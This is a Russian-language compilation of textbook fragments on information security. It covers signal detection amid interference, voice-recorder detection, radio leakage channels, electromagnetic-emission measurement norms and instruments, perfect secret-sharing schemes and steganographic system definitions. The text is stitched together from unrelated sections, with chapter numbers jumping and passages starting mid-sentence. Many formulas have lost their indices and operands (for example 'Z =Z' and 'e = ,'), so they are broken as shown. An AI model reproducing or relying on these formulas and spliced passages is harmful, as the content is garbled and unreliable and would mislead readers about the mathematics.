В данном случае, как и во всех последующих случаях решения общей задачи обнаружения, будем пользоваться упрощенным решающим правилом, которое заключается в том, что при равновероятных сообщениях (p = const), равновеликих по энергии сигналах (S, S= const), отсутствие корреляции между полезными сигналами и помехой (V, S= 0) и простой функции потерь оптимальное решающее правило сводится к выбору наибольшего выходного сигнала приемника:
(g : H) Z =Z
Здесь S— комплексно-сопряженный вектор-столбец по отношению к S; T — знак трансформации вектора-столбца в вектор-строку.
Решение задачи обнаружения предусматривает получение выходных сигналов Z (для гипотезы H) и Z (для гипотезы H), а затем выбор большего из них. При этом в структуре оптимального классификатора роль величины, с которой сравнивается выходной сигнал канала обработки Z, играет порог обнаружения, а сама рассматриваемая процедура сводится к классической процедуре обнаружения принятого сигнала. Особенностями здесь будут наличие и влияние непреднамеренных помех. Естественно, результаты этого воздействия будут зависеть от вида (моделей) помехи и сигнала, их характеристик.
В общем случае выходной сигнал приемника можно представить в виде взвешенной суммы квадратов модулей (или самих модулей) комплексных преддетекторных сигналов
Z = c; ,
где Y — комплексный преддетекторный сигнал в x-м сочетании V-помехи и m-й части полезного сигнала (x=mV) при i-й гипотезе; c — весовой коэффициент; (x) — множество сочетаний mV.
В этом выражении комплексный преддетекторный сигнал является результатом прохождения входного сигнала Uj через линейный фильтр или результатом корреляции входного сигнала с опорным сигналом
Y = Ur(i=1),
где
Uj =
r— i-й опорный сигнал, N — количество мешающих сигналов.
Опорный сигнал при оптимальном приеме в условиях воздействия непреднамеренных помех равен r = r, при согласованном приеме r = S. В свою очередь, оптимальный опорный сигнал r, в зависимости от вида помехи, выражается одним из соотношений:
детерминированная |
r = S ; |
квазидетерминированная, имеющая случайную начальную фазу при неслучайной (известной) или случайной амплитуде |
r = S – SV; |
квазидетерминированная со случайной фазой и амплитудой |
r = S – V ; |
случайная (сложная) |
r = e – r ; |
групповая непреднамеренная c = er + 2N — весовой коэффициент. |
r = e – r; |
корреляция входного сигнала с опорным сигналом, что равносильно линейной пространственно-временной преддетекторной фильтрации;
получение модуля комплексного сигнала Y, что соответствует детектированию этого сигнала;
взвешенное суммирование полученных модулей или квадратов модулей, образующее выходной сигнал приемника;
сравнение выходного сигнала приемника с порогом.
Решение об обнаружении полезного сигнала принимается в случае превышения порога выходным сигналом.
Согласно принятому решающему правилу вероятностные характеристики качества обнаружения принимают следующие значения:
p = p = dZ ,
p = p = dZ ,
где w(Z), w(Z) — плотность вероятности выходного сигнала приемника при условии, что на входе приемника присутствует или отсутствует полезный сигнал; p = p — вероятность обнаружения; p = p — вероятность ложной тревоги.
Проанализируем на основании уже проведенных рассуждений качество обнаружения сигнала при детерминированной помехе. Пусть на вход приемника поступают сигнал bS, детерминированная помеха V и имеются собственные шумы n приемника. Согласно структуре оптимального приемника преддетекторный сигнал имеет вид
Y = (Uj – V) ,
где Uj =
Из этого выражения видно, что при оптимальном приеме детерминированная помеха не влияет на преддетекторный сигнал.
Y =
Обнаружение записывающих устройств (диктофонов)
В настоящее время широкое распространение получила скрытая запись на диктофоны как способ документирования речевой информации.
Каким требованиям должен соответствовать обнаружитель диктофонов (ОД)? Всего нескольким: быстро и скрытно обнаруживать любые диктофоны на приемлемом расстоянии и сигнализировать об этом. Однако способы достижения указанных целей могут сильно различаться в зависимости от того, должен ли ОД быть портативным, обслуживать офис или большой зал заседаний. Таким образом, существует потребность в целом спектре устройств.
Однако существующие модели (RS100, RS200, PTRD 014-017, APK) обладают невысокой дальностью и не могут в полной мере удовлетворить пользователей. Причина такого положения заключается в сложности самой задачи обнаружения диктофонов. Прежде всего, она в том, что собственное излучение объекта является сверхслабым. Поэтому для его обнаружения приходится использовать сверхчувствительные каналы получения информации. При этом возникает другая проблема. Прибор очень чувствителен, он “видит”: компьютеры за стеной, изменения в сети 220 В × 50 Гц, поля от проходящего транспорта и т.д. Все эти сигналы немного превосходят по уровню измеряемый сигнал и являются помехами, поэтому приходится решать задачу обнаружения слабых сигналов в сложной помеховой обстановке.
Образование радиоканаловутечки информации
В современных условиях насыщенности нашей жизни самыми разнообразными техническими, особенно электронными, средствами производственной и трудовой деятельности, различными средствами связи, разного рода вспомогательными системами (телевидение, радиовещание) крайне необходимо понимать опасность возникновения канала утечки информации с ограниченным доступом именно через технические средства ее обработки. Более того, технические средства относятся едва ли не к наиболее опасным и широко распространенным каналам утечки информации.
Анализ физической природы многочисленных преобразователей и излучателей показывает, что:
источниками опасного сигнала являются элементы, узлы и проводники технических средств обеспечения производственной и трудовой деятельности, а также радио- и электронная аппаратура;
каждый источник опасного сигнала при определенных условиях может образовать технический канал утечки информации;
каждая электронная система, содержащая в себе совокупность элементов, узлов и проводников, обладает некоторым множеством технических каналов утечки информации.
С определенной степенью обобщения множество радиоканалов утечки информации можно представить в виде следующей структуры (рис. 5.1).
Каждый из этих каналов, в зависимости от конкретной реализации элементов, узлов и изделий в целом, будет иметь определенное проявление, специфические характеристики и особенности образования, связанные с условиями расположения и исполнения.
Наличие и конкретные характеристики каждого источника образования канала утечки информации изучаются, исследуются и определяются конкретно для каждого образца технических средств на специально оборудованных для этого испытательных стендах и в специальных лабораториях.
Рис. 5.1. Структура радиоканалов утечки информации
Классификация радиоканалов утечки информации по природе образования, диапазону излучения и среде распространения представлена на рис. 5.2.
Общая схема проведения работ по ЗИ
В соответствии с вышеизложенным алгоритм проведения работ по ЗИ должен быть следующим.
1. Прежде всего, необходимо определить, имеется ли на объекте информация, которую необходимо защищать, и какая степень защиты должна обеспечиваться. Кроме того, следует определить объем средств, необходимых для обеспечения заданного уровня защиты.
2. После оценки целесообразности создания СЗИ следует выявить или спрогнозировать, по возможности, все угрозы сохранности и возможные каналы утечки информации.
3. Следующим шагом является анализ мероприятий по ЗИ объекта.
Для анализа мероприятий по ЗИ на объекте необходимо оценить направление деятельности системы защиты. Для построения эффективной СЗИ целесообразно выделить следующие направления:
защита объекта;
защита процессов или процедур обработки и хранения информации, защита изделий;
защита каналов связи;
подавление побочных электромагнитных излучений;
контроль и управление СЗИ.
При этом для защиты объектов необходимо выделить следующие функции, процедуры и средства защиты вне зависимости от категории объекта.
1. Минимизация сведений, доступных персоналу.
2. Минимизация связей персонала.
3. Разделение полномочий.
4. Минимизация данных, доступных персоналу.
5. Дублирование контроля.
6. Управление доступом.
7. Защита файлов и баз данных автоматизированных систем.
8. Идентификация защищенного объекта.
9. Представление полномочий.
После определений функций ЗИ на объекте можно приступить к анализу требований к КСЗИ.
Глава 16
Технические методы и средства защиты информации
Оценка электромагнитных полей
Оценка электромагнитных полей полезных и мешающих сигналов в месте приема или оценка собственно радиосигналов на входе приемника (после преобразования электромагнитного поля в радиосигналы антенной приемного устройства) составляет сущность электромагнитной обстановки, которая отражается статической моделью (рис. 5.3).
Модель содержит блоки канала передачи информации и звенья описания состояний информации. Блоки модели соответствуют материальным элементам, обеспечивающим формирование, передачу, распространение и, частично, прием радиосигналов. В соответствии с этим модель электромагнитной обстановки (ЭМО) включает в себя следующие блоки: источник полезных сигналов; источники мешающих сигналов (непреднамеренных помех); среда распространения электромагнитных колебаний.
Информационное описание процессов формирования ЭМО с учетом наличия непреднамеренных помех осуществляется в звеньях (пространствах): пространстве сообщений L, пространстве полезных сигналов S, пространстве мешающих сигналов V и пространстве входных сигналов U.
Рис. 5.2. Классификация радиоканалов утечки информации
Рис. 5.3. Статическая модель формирования электромагнитной обстановки
При этом входные сигналы могут рассматриваться в двух вариантах:
на входе приемного устройства в форме электромагнитных полей;
на входе приемника в форме радиосигнала.
Начальным в модели является звено, представляемое пространством сообщений L. Пространство сообщений объединяет множество всех возможных классов (разновидностей) сообщений. Каждое из сообщений является строго детерминированным, но появление того или другого сообщения на приемном конце канала передачи информации для получения сообщения является случайным событием. С учетом этого сообщение будет рассматриваться как случайное событие конечного множества возможных сообщений.
Смысл сообщения и количество классов сообщений зависят от функциональных задач, выполняемых радиоэлектронными средствами.
Множество классов сообщений l = (l, l, ..., l) в любом случае полагается ограниченным (m ¹ ¥).
Каждый из l классов сообщений отличается от другого класса сообщения существом информационного содержания. Особый смысл имеет нулевой класс сообщения l — он означает отсутствие сообщения. Так, для радиоэлектронных средств (РЭС) радиоэлектронной разведки при решении задачи обнаружения источника излучения множество всех возможных сообщений состоит из двух классов: l — излучение отсутствует, l — излучение от объекта имеется. Для разносвязных каналов при передаче символов, алфавит которых содержит m различных символов, пространство сообщений состоит из m + 1 класса. Нулевой класс l и в этом случае соответствует отсутствию передачи какого-либо из m символов.
Статистическая характеристика пространства сообщений выражается совокупностью априорных вероятностей всех возможных сообщений. Это означает, что каждому классу сообщения приписывается определенная вероятность его появления. Априорные вероятности сообщений полагаются либо заранее известными, либо определяемыми каким-либо известным способом.
Важным свойством сообщений является их классификационная упорядоченность, при которой имеется строгое соответствие каждого класса своему классу решения задачи в классификационной схеме задач.
Все многообразие функциональных задач, реализуемых радиоприемными устройствами РЭС может быть сведено к трем основным задачам: обнаружение, распознавание и измерение параметров сигнала.
В свою очередь, три основные задачи могут быть систематизированы и объединены единой схемой классификации (рис. 5.4).
Схема классификационных задач имеет иерархическую структуру. Верхний уровень схемы отвечает двухвариантной задаче обнаружения, все последующие ниже расположенные уровни соответствуют многовариантным задачам распознавания и измерения. Каждому ниже расположенному уровню соответствует более детальное распознавание и, соответственно, большее число классов решений. Нижний уровень отражает задачу измерения, которая представлена набором дискретов значений измеряемого параметра.
Это означает, что сообщениям, как и возможным решениям задач РЭС, свойственна единая иерархическая структура классификационной схемы с горизонтальной несовместимостью и вертикальной совместимостью классов сообщений как случайных событий.
Отметим, что с учетом нулевого класса сообщений, сумма вероятностей классов сообщений по горизонталям классификационной схемы равна единице, т.е. все классы сообщений (включая и нулевой класс) по каждому из видов задач РЭС составляют полную группу случайных событий.
Рис. 5.4. Классификация функциональных задач РЭС
Источник полезного сигнала, следующий по схеме за звеном пространства сообщений, осуществляет формирование радиосигнала из сообщения
S = F(l)
Оператор F определяет способ формирования сигнала из сообщения, т.е. характеризует выбор переносчика информации и способ его кодирования (модуляции) сообщением. Типичным переносчиком информации при функционировании РЭС выступают гармонические колебания, модулированные тем или иным способом.
Множество всех полезных сигналов заполняет пространство полезных сигналов S = S, S, ..., S, где S — нулевой сигнал, соответствующий отсутствию сообщения. Излучаемые сигналы представляются функциями пространственных координат (x, y, z) источника сигналов, времени t, совокупности существенных параметров a и совокупности несущественных параметров b:
S = s(x, y, z, a, b)
Каждому классу сообщения ставится в соответствие свой класс полезного сигнала. При этом сообщение закодировано в существенных параметрах, а сигнал i-го класса является узкополосным:
S = s( x, y, z, t, a) b exp(jwt),
где s(x, y, z, t, a) — комплексная модулирующая функция, соответствующая i-му сообщению; b — комплексный множитель, являющийся функцией несущественных параметров; w — частота несущей высокочастотного сигнала.
Заметим, что i-му сообщению может соответствовать множество сигналов, но все они принадлежат сигналам i-го класса. Это обусловлено наличием множества возможных значений несущественных параметров, которые являются случайными величинами и свойства которых могут существенно влиять на обеспечение ЭМО.
Полезные сигналы в форме высокочастотных колебаний излучаются в пространство и через среду распространения поступают на вход приемного устройства.
Среда распространения отображается оператором F преобразования сигналов, который характеризует рассеяние, затухание и мультипликативные искажения последних во времени и пространстве:
U (x, y, z, t, a, b) = F (s, x, y, z, t), (5.1)
где x, y, z, t — пространственно-временные координаты в месте приема сигнала.
Входной полезный сигнал может рассматриваться как на входе антенны приемного устройства, так и на входе собственно приемника (после антенны). В первом случае выражение (5.1) относятся к электромагнитному полю на входе приемного устройства (на входе антенны приемника), во втором — к напряжению полезного сигнала после антенны.
Совместно с полезным сигналом на вход приемника поступают и мешающие сигналы (непреднамеренные помехи). Каждый из мешающих сигналов создается своим источником непреднамеренных помех, расположенном в определенном месте и излучающим свойственный ему сигнал. В результате на входе приемника имеет место аддитивная смесь полезного сигнала, мешающего сигнала и входных шумов приемника:
U(x, y, z, t) = U (x, y, z, t, a, b) + U (x, y, z, t, b) + U (x, y, z) ,
где a, b — существенные и несущественные параметры полезного сигнала; b — параметры непреднамеренной помехи, являющиеся несущественными для получателя полезной информации.
Все множество возможных принимаемых сигналов представляется в пространстве U входных сигналов. Это пространство является оконечным звеном в статической модели формирования электромагнитной обстановки. Представляемые в нем входные сигналы составляют описание электромагнитной обстановки, в которой функционирует РЭС.
Оценка параметров сигналов в условияхвоздействия непреднамеренных помех
Качество оценки многомерного параметра l = (l, l, ..., l) сигнала характеризуется матрицей начальных вторых моментов ошибок измерения
E = ïïeïï (5.2)
В общем случае параметр сигнала при воздействии непреднамеренной помехи может быть оценен следующим образом. Предположим, что Z(l) — некоторый, в общем случае не оптимальный, выходной сигнал радиоприемного устройства и что на вход приемника поступает аддитивная смесь полезного сигнала, мешающего сигнала (непреднамеренной помехи) и входных шумов приемника вида
U(x, y, z, t) = U (x, y, z, t, a, b) + U (x, y, z, t, b) + U (x, y, z, t)
При энергетических отношениях сигнал-шум и сигнал-помеха, достаточно больших для надежной работы измерителя, выходной сигнал Z(l) имеет в окрестности истинного значения параметра l и ярко выраженный выброс, точка максимума которого l принимается за оценку. При этом оценка l = l может быть определена из системы уравнений
{M[Z(l)] + (l)} = 0,
{M[Z(l)] + (l)} = 0, (5.3)
. . .
{M[Z(l)] + (l)} = 0,
в которой выходной сигнал Z(l) представлен в виде суммы математического ожидания M[Z(l)] и случайной централизованной функции (l):
Z(l) = (l) + M[Z(l)] (5.4)
Произведя разложение M[Z(l)] в окрестности истинного значения измеряемого параметра l = (l, …, l) в степенной ряд и сохраняя только слагаемые с низшими степенями малых величин, вместо (5.3) получим
(l – l)M[Z(l)] + Z(l) = 0,
. . . (5.5)
(l – l)M[Z(l)] + Z(l) = 0,
Обозначим
B = M[Z(l)], h = Z(l), (5.6)
h = ïïh, ..., hïï, B = ïïBïï
В (5.6), в отличие от (5.5), аргумент l заменен на l, что допустимо ввиду практического равенства статических характеристик процессов Z(l) и Z(l) в окрестности оценки.
Система уравнений (5.5) в матричной форме принимает вид B(l – l) = h, откуда
(l – l) = B h (5.7)
и вторые начальные моменты ошибок
e = M[(l – l) (l – l)] = B BM[hh], (5.8)
где B — элементы матрицы B, которая является обратной по отношению к матрице B.
Для скалярной величины (l = l) выражение (5.8) преобразуется в формулу для среднего квадрата измерения:
e = , (5.9)
или, представляя Z(l) согласно (5.3) в форме двух слагаемых, получаем
e = (Dl) + s = + (5.10)
В формулах (5.9) и (5.10) берутся производные по l, а затем подставляется значение параметра l = l. Выражение (5.10) имеет два слагаемых. Первое из слагаемых выражает квадрат постоянной ошибки (Dl) (квадрат смещения оценки). Второе слагаемое есть дисперсия оценки s. При несмещенной оценке средний квадрат ошибки измерения равен второму слагаемому.
Воздействие непреднамеренной помехи на приемное устройство приводит к снижению точности определения сигнала, что выражается в увеличении среднего квадрата ошибки измерения. При этом увеличение ошибки измерения за счет воздействия непреднамеренной помехи не должно превышать допустимую величину (De) = e – e, где e — величина среднего квадрата ошибки измерения при отсутствии непреднамеренной помехи.
Для заданных полезного сигнала и непреднамеренной помехи, когда r(l), квадрат ошибки измерения, зависит от энергетических параметров q и q, энергетические соотношения, удовлетворяющие предыдущему уравнению, определяют защитное отношение для приемника
k = =
Так, при согласованном приеме сигнала со случайной начальной фазой и амплитудой на фоне квазидетерминированной непреднамеренной помехи
(De) = 0,5 q [r'(l)]/[r''(l)]
Отсюда искомое защитное отношение
k = 0,5 [r'(l)]/(De) [r''(l)]
Для шумовой помехи выражение для защитного отношения примет вид
k = 0,5 (De) [r''(l)]
Глава 6
Классификация акустических каналов утечки информации
Оценка уровня ПЭМИ
Оценка уровня ПЭМИ средств цифровой электронной техники может производиться с точки зрения соответствия этих уровней следующим нормам и требованиям:
санитарно-гигиенические нормы (ГОСТ 12.1.006-84);
нормы электромагнитной совместимости (ЭМС);
нормы и требования по ЗИ об утечке через ПЭМИ.
В зависимости от того, соответствие каким нормам требуется установить, используются те или иные приборы, методы и методики проведения измерений.
Следует заметить, что нормы на уровни ЭМИ с точки зрения ЭМС существенно (на несколько порядков) строже санитарно-гигиенических норм. Очевидно, что нормы, методики и приборы, используемые в системе обеспечения безопасности жизнедеятельности, не могут быть использованы при решении задач ЗИ.
Уровни ПЭМИ цифровой электронной техники с точки зрения ЭМС регламентированы целым рядом международных и отечественных стандартов (публикации CISPR — специального международного комитета по радиопомехам, ГОСТ 29216-91) устанавливает следующие нормы напряженности поля радиопомех от оборудования информационной техники (табл. 11.1).
Таблица 11.1. Нормы напряженности поля радиопомех
Полоса частот, МГц | Квазипиковые нормы, ДБ миВ/м (миВ/м) | ||
30–230 | 30 (31,6) | ||
230–1000 | 37 (70,8) |
Уровни напряженности поля излучаемых помех нормируются на расстоянии 10 или 30 м от источника помех в зависимости от того, где будет эксплуатироваться оборудование (в жилых помещениях или в условиях промышленных предприятий).
Приведенные допускаемые уровни излучения достаточны для перехвата ЭМИ на значительном расстоянии. Кроме того, в диапазоне частот 0,15–30 МГц нормируются только уровни напряжения помех на сетевых зажимах оборудования и не нормируется напряженность поля радиопомех. Данные нормы при серийном выпуске выполняются с какой-то вероятностью.
Таким образом, соответствие ПЭМИ средств цифровой электронной техники нормам на ЭМС не может быть гарантией сохранения конфиденциальности информации, обрабатываемой с помощью этих средств.
Однако высокая степень стандартизации методик и аппаратуры измерения уровня ЭМИ при решении задач оценки ЭМС делает возможным (с учетом некоторых особенностей) использование их при решении задач ЗИ.
Остановимся на характеристиках используемой измерительной аппаратуры:
диапазон рабочих частот — 9 МГц – 1000 МГц;
возможность изменения полосы пропускания;
наличие детекторов квазипикового, пикового, среднего и среднеквадратического значений;
возможность слухового контроля сигнала, имеющего амплитудную и частотную модуляцию;
наличие выхода промежуточной частоты и выхода на осциллограф;
наличие комплекта стандартных калибровочных антенн.
Приборы, используемые на практике для определения ЭМС, перечислены в табл. 11.2.
Таблица 11.2. Приборы, используемые для определения ЭМС
Прибор |
Диапазон рабочих частот, МГц |
Производитель |
SMV-8 |
26–1000 |
Messelecktronik, Германия |
SMV-11 |
0,009–30 |
— " — |
SMV-41 |
0,009–1000 |
— " — |
“Элмас” |
30–1300 |
ПО “Вектор”, С.–Петербург |
ESH-2 |
0,009–30 |
RHODE & SHWARZ, ФРГ |
ESV |
20–1000 |
— " — |
ESH-3 |
0,009–30 |
— " — |
ESVP |
20–1300 |
— " — |
Кроме перечисленных в табл. 11.2 приборов, для измерения побочных ЭМИ средств цифровой электронной техники могут быть использованы анализаторы спектра в комплекте с измерительными антеннами (табл. 11.3).
Таблица 11.3. Анализаторы спектра
Прибор |
Диапазон рабочих частот, МГц |
Диапазон измерения |
Производитель |
СЧ-82 |
3 · 10-4 – 1500 |
1 миВ – 3 В |
СНГ |
СКЧ-84 |
3 · 10-5 – 110 |
70 нВ – 2,2 В |
— " — |
СЧ-85 |
1 · 10-4 – 39,6 · 103 |
1 миВ – 3 В 10-16 – 10-2 Вт |
— " — |
РСКЧ-86 |
25 – 1500 |
40 нВ – 2,8 В 3 10-17 – 1 Вт |
— " — |
РСКЧ-87 |
1000 – 4000 |
10-12 – 0,1 Вт |
— " — |
РСКЧ-90 |
1000 – 17440 |
10-12 – 0,1 Вт |
— " — |
НР8568В |
1 · 10-4 – 1500 |
10-16 – 1 Вт |
Hewlett-Packard, США |
Окончание таблицы 11.3
Прибор |
Диапазон рабочих частот, МГц |
Диапазон измерения |
Производитель |
НР71100А |
1 · 10-4 – 2900 |
10-16 – 1 Вт |
— " — |
НР8566 В |
1 · 10-4 – 22000 |
10-16 – 1 Вт |
— " — |
2756Р |
1 · 10-2 – 3,25 · 103 |
10-16 – 1 Вт |
Tektronix, США |
2380-2383 |
1 · 10-4 – 4200 |
10-18 – 1 Вт |
Marconi Instruments, Англия |
FSA |
1 · 10-4 – 2000 |
10-17 – 1 Вт |
RHODE & SHWARZ, ФРГ |
FSB |
1 · 10-4 – 5000 |
10-17 – 1 Вт |
— " — |
В процессе обработки могут выполняться следующие функции: поиск экстремальных значений сигнала; отбор сигналов, уровень которых превосходит заданный сдвиг по оси частот для оптимальной регистрации сигнала. Встроенный микропроцессор обеспечивает обработку амплитудно-частотных спектров, а также оптимизацию времени измерения и разрешающей способности для рассматриваемого интервала частот.
В отличие от задач ЭМС, где требуется определить максимальный уровень излучения в заданном диапазоне частот, при решении задач ЗИ требуется определить уровень излучения в широком диапазоне частот, соответствующем информативному сигналу. Поэтому оценка уровня излучений при решении задач ЗИ должна начинаться с анализа технической документации и отбора электрических цепей, по которым можно передавать информацию с ограниченным доступом. Необходимо провести анализ и определить характеристики опасных сигналов:
используемый код: последовательный, параллельный;
периодическое повторение сигнала: есть, нет;
временные характеристики сигнала;
спектральные характеристики сигнала.
После этого можно приступать непосредственно к определению уровней информативных ПЭМИ. Здесь используются следующие методы: метод оценочных расчетов, метод принудительной (искусственной) активизации; метод эквивалентного приемника.
называется совершенной вероятностной СРС, реализующей
Пара (P,S) называется совершенной вероятностной СРС, реализующей структуру доступа Г, если
P(S0 = c0
| Si = ci, i Î A) Î {0, 1} для A Î Г, (18.1)
P(S0 = c0 | Si = ci, i Î A) = P(S0 = c0) для A Ï Г (18.2)
Это определение можно истолковать следующим образом. Имеется множество S0 всех возможных секретов, из которого секрет s0 выбирается с вероятностью p(s0), и имеется СРС, которая “распределяет” секрет s0 между n участниками, посылая “проекции” s1, …, sn секрета с вероятностью PS0 (s1, …, sn). Отметим, что і-ый учасник получает свою “проекцию” si Î Si и не имеет информации о значениях других “проекций”, однако знает все множества Si, а также оба распределения вероятностей p(s0) и PS0(s1, …, sn). Эти два распределения могут быть эквивалентны заменене на одно: P(s0, s1, …, sn) = p(S0)PS0(s1, …, sn), что и было сделано выше. Цель СРС, как указывалось во введении, состоит в том, чтобы:
участники из разрешенного множества A (т. е. A Î Г) вместе могли бы однозначно восстановить значение секрета — это отражено в свойстве (18.1);
участники, образующие неразрешенное множество А (А Ï Г), не могли бы получить дополнительную информацию об s0, т.е., чтобы вероятность того, что значение секрета S0
= c0, не зависела от значений “проекций” Si при і Î А — это свойство (18.2).
Замечание о терминологии. В англоязычной литературе для обозначения “порции” информации, посылаемой участнику СРС, были введены термины share (А. Шамир) и shadow (Г. Блейкли). Первый термин оказался наиболее популярным, но неадекватная (во всех смыслах) замена в данной работе акции на проекцию может быть несколько оправдана следующим примером.
Пример 18.1. Множество S0 всех возможных секретов состоит из 0, 1 и 2, “представленных”, соответственно: шаром; кубом, ребра которого параллельны осям координат; цилиндром, образующие которого параллельны оси Z. При этом диаметры шара и основания цилиндра, и длины ребра куба и образующей цилиндра, равны.
Матрица V задает совершенную комбинаторную СРС, реализующую структуру доступа Г, если, во-первых, для любого множества А Î Г нулевая координата любой строки матрицы V однозначно определяется значениями ее координат из множества А, и, во-вторых, для любого множества А Ï Г и любых заданных значений координат из множества А число строк матрицы V с данным значением ? нулевой координаты не зависит от ?.
Сопоставим совершенной вероятностной СРС, задаваемой парой (P, S), матрицу V, состоящую из строк s Î S, таких что P(s) > 0. Заметим, что если в определении 1 положить все ненулевые значения P одинаковыми, а условия (18.1) и (18.2) переформулировать на комбинаторном языке, то получится определение 2. Это комбинаторное определение несколько обобщается, если допустить в матрице V повторяющиеся строки, что эквивалентно вероятностному определению 1, когда значения вероятностей P(s) — рациональные числа.
Продолжение примера 18.2 (из предыдущего раздела). Переформулируем данную выше конструкцию (n,n)-пороговой СРС на комбинаторном языке. Строками матрицы V являются все векторы s такие, что s0 + s1 + … + sn = 0. Очевидно, что матрица V задает совершенную комбинаторную СРС для Г={1, …, n}, так как для любого собственного подмножества А Ì {1, …, n} и любых заданных значений координат из множества А число строк матрицы V с данным значением нулевой координаты равно qn–1 – |A|.
Удивительно, но простой схемы примера 2 оказывается достаточно, чтобы из нее, как из кирпичиков, построить совершенную СРС для произвольной структуры доступа. А именно, для всех разрешенных множеств, т.е. для А Î Г, независимо реализуем описанную только что пороговую (|A|, |A|)-СРС, послав тем самым і-му учаснику cтолько “проекций” siA, скольким разрешенным множествам он принадлежит. Это словесное описание несложно перевести на комбинаторный язык свойств матрицы V и убедиться, что эта СРС совершенна. Как это часто бывает, “совершенная” не значит “экономная”, и у данной СРС размер “проекции” оказывается, как правило, во много раз больше, чем размер секрета.
Матрица V задает БД- совершенную СРС, реализующую структуру доступа Г, если
||VAÈ0|| = ||VA|| × ||V0||?Г (А), (18.4)
где ?Г
(А) = 0, если А Î Г, и ?Г
(А) = 1 в противном случае.
Это определение отличается от определений 1 и 2 тем, что на неразрешенные множества А накладываются довольно слабое условие, а именно, если множество строк V с данными значениями координат из множества А непусто, то все возможные значения секрета встречаются в нулевой координате этих строк (без требований “одинаково часто” как в комбинаторном определении 2 или же “с априорной вероятностью” как в вероятностном определении 1). Легко видеть, что матрица любой совершенной вероятностной СРС задает БД-совершенную СРС, но обратное неверно.
Для произвольной комбинаторной СРС, задаваемой матрицей V, определим на множествах А Í {0, 1, …, n} функцию h(A) = logq
||VA||, где q = |S0|. Легко проверить, что max{h(A), h(B)} £ h(A È B) £ h(A) + h(B) для любых множеств А и В, а условие (184) может быть переписано в виде
hq(VAÈ0) = hq(VA) + ?Г (А) hq(V0)
Лемма. Для любой БД-совершенной СРС если А Ï Г и {A È i} Î Г, то h(i) ³ h(0).
Доказательство. По условиям леммы
h(A È 0) = h(A) + h(0) и h(A È i È 0) = h(A È і). Следовательно,
h(A) + h(i) ³ h (A È і) = h (A È і È 0) ³ h(A È 0) = h(A) + h(0)
Так мы предполагаем, что все точки і Î {1, …, n} существенные, т.е. для любого і найдется подмножество А такое, что А Ï Г и {A È і} Î Г, то из леммы вытекает
Следствие. Для любой БД-совершенной СРС |Si| ³ |S0| для всех і = 1, ..., n.
Следствие означает, как отмечалось выше, что для совершенных СРС “размер” проекции не может быть меньше “размера” секрета. Поэтому БД-совершенная СРС называется идеальной, если |Si| = |S0| для всех і = 1, ..., n.
Замечание. Неравенство |Si| ³ |S0| справедливо и для совершенных вероятностных СРС, поскольку их матрицы задают БД-совершенные СРС.
и извлечения сообщения из контейнера,
Совокупность X=<C,М,D,E>, где С — множество возможных контейнеров; М — множество секретных сообщений, |C|³|М|; E: C´M®С и D: C®M — функции сокрытия и извлечения сообщения из контейнера, причем D(E(c,m))=m для любых mÎМ и сÎС, называется безключевой стегосистемой.
Из определения следует, что безопасность безключевых стегосистем основана на секретности используемых стеганографических преобразований E и D. Это противоречит основному принципу Керкхоффса для систем защиты информации. Действительно, если предположить, что противник знает алгоритмы E и D, которые используются для скрытой передачи информации, то он способен извлечь любую скрытую информацию из перехваченных стеганограмм.
Зачастую для повышения безопасности безключевых систем, перед началом процесса стеганографического сокрытия предварительно выполняется шифрование скрываемой информации. Ясно, что такой подход увеличивает защищенность всего процесса связи, поскольку это усложняет обнаружение скрытого сообщения. Однако, “сильные” стеганографические системы, как правило, не нуждаются в предварительном шифровании скрываемых сообщений.
Стегосистемой с секретным ключом называется совокупность X=<C,М,К,D,E>, где С — множество возможных контейнеров; М — множество секретных сообщений, причем |C|³|М|; К — множество секретных ключей; EК:C´M´К®С и DК:C´К®M — стеганографические преобразования со свойством DК(EК(c,m,k),k)=m для любых mÎМ, сÎС и kÎK.
Данный тип стегосистем предполагает наличие безопасного канала для обмена стегоключами.
Иногда стегоключ k вычисляют с помощью секретной хеш-функции Hash, используя некоторые характерные особенности контейнера: k = Hash (особенности контейнера). Если стеганографическое преобразование Е не изменяет в результирующей стеганограмме выбранные особенности контейнера, то получатель также сможет вычислить стегоключ (хотя и в этом случае защита зависит от секретности функции Hash, и таким образом, снова нарушается принцип Керкхоффса). Очевидно, что для достижения адекватного уровня защиты, такую особенность в контейнере необходимо выбирать очень аккуратно.
В некоторых алгоритмах при извлечении скрытой информации дополнительно требуются сведения об исходном контейнере или некоторых других данных, которые отсутствует в стеганограмме. Такие системы представляют ограниченный интерес, поскольку они требуют передачи первоначального вида контейнера, что эквивалентно традиционной задаче ключевого обмена. Подобные алгоритмы могут быть отмечены как частный случай стегосистем с секретным ключом, в которых K=C или K=C´K', где K' — означает дополнительный набор секретных ключей.
Стегосистемой с открытым ключом называется совокупность X=<C,М,К,D,E>, где С — множество возможных контейнеров; М — множество секретных сообщений, причем |C|³|М|; К=(k1, k2) — множество пар стегоключей (открытый ключ k1 используется для сокрытия информации, а секретный k2
— для извлечения); EК:C´M´k1®С и DК:C´k2®M — стеганографические преобразования со свойством DК(EК(c,m,k1), k2) = m для любых mÎМ, сÎС.
Простым способом реализации подобных стегосистем является использование криптосистем с открытым ключом. Стегосистемы с открытыми ключами используют тот факт, что функция извлечения скрытой информации D может быть применима к любому контейнеру вне зависимости от того, находится ли в нем скрытое сообщение или нет. Если в контейнере отсутствует скрытое сообщение, то всегда будет восстанавливаться некоторая случайная последовательность. Если эта последовательность статистически не отличается от шифртекста криптосистемы с открытым ключом, тогда в безопасной стегосистеме можно скрывать полученный таким образом шифртекст, а не открытый.
Функцией имитации n- го порядка будем называть такую функцию f, которая в e-окрестности выполняет статистически эквивалентное преобразование файла А в файл В.
Таким образом, если p(t, A) — вероятность появления некоторой строки t в файле А, то функция f преобразует файл А в файл В так, что для всех строк t длиной меньше n выполняется соотношение |p(t, f(A)) –p(t, B)| < e.
Можно предложить несколько типов функции имитации, которые, в зависимости от сложности, моделируются регулярной, контекстно-свободной или рекурсивно-счетной грамматиками. Стеганографические преобразования первого типа описываются в терминах процедур сжатия информации; второго — контекстно-свободными грамматиками, в которых скрываемые биты управляют непротиворечивыми продукциями; для описания функций третьего типа применяется аппарат машин Тьюринга.
